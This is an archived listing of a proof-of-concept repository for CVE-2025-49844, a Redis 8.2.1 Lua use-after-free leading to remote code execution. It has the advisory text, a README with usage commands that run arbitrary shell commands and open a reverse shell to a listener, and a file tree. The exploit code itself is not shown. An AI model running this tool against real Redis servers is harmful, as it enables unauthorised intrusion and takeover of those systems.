Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-49844 PoC — Redis 资源管理错误漏洞

Source
Associated Vulnerability
Title:Redis 资源管理错误漏洞 (CVE-2025-49844)
Description:Redis是美国Redis公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。 Redis 8.2.1及之前版本存在资源管理错误漏洞,该漏洞源于特制Lua脚本可操纵垃圾收集器,触发释放后重用,可能导致远程代码执行。
Description
Proof-of-concept for CVE-2025-49844
Readme
# CVE-2025-49844

My personal proof-of-concept for [CVE-2025-49844], also known as [RediShell].

Supported target builds:
- x86-64 Linux `redis:8.2.1-alpine` Docker image
- x86-64 Linux `redis:8.2.1-bookworm` Docker image

It's a bit clumsy, probably not as good as Wiz Research's. Still, I'm glad I managed to get it working before the Hexacon 2025 talks are uploaded, and I had a great time investigating it.

## Usage

Run one-way shell commands:
```sh
$ uv run cve-2025-49844 command "echo 'hello world' > /data/hello.txt"
```

Connect to a reverse shell:
```sh
$ uv run cve-2025-49844 rshell -l 127.0.0.1 -p 4444
```

[CVE-2025-49844]:https://nvd.nist.gov/vuln/detail/CVE-2025-49844
[RediShell]:https://www.wiz.io/blog/wiz-research-redis-rce-cve-2025-49844
File Snapshot

[4.0K] /data/pocs/e52624e635182442b184d093fc55a77971387adf ├── [1.6K] demonstration.py ├── [4.0K] dockerfiles │   ├── [4.0K] redis-8.2.1-alpine │   │   ├── [ 105] compose.yaml │   │   └── [ 65] Dockerfile │   └── [4.0K] redis-8.2.1-bookworm │   ├── [ 105] compose.yaml │   └── [ 67] Dockerfile ├── [1.0K] LICENSE ├── [ 406] pyproject.toml ├── [ 762] README.md ├── [4.0K] src │   └── [4.0K] cve_2025_49844 │   ├── [ 0] __init__.py │   ├── [ 28K] main.py │   ├── [7.8K] redis_8_2_1_alpine.py │   ├── [7.0K] redis_8_2_1_bookworm.py │   ├── [1.8K] shared.py │   ├── [ 11K] shellcode.py │   └── [ 418] util.py └── [ 11K] uv.lock 6 directories, 16 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.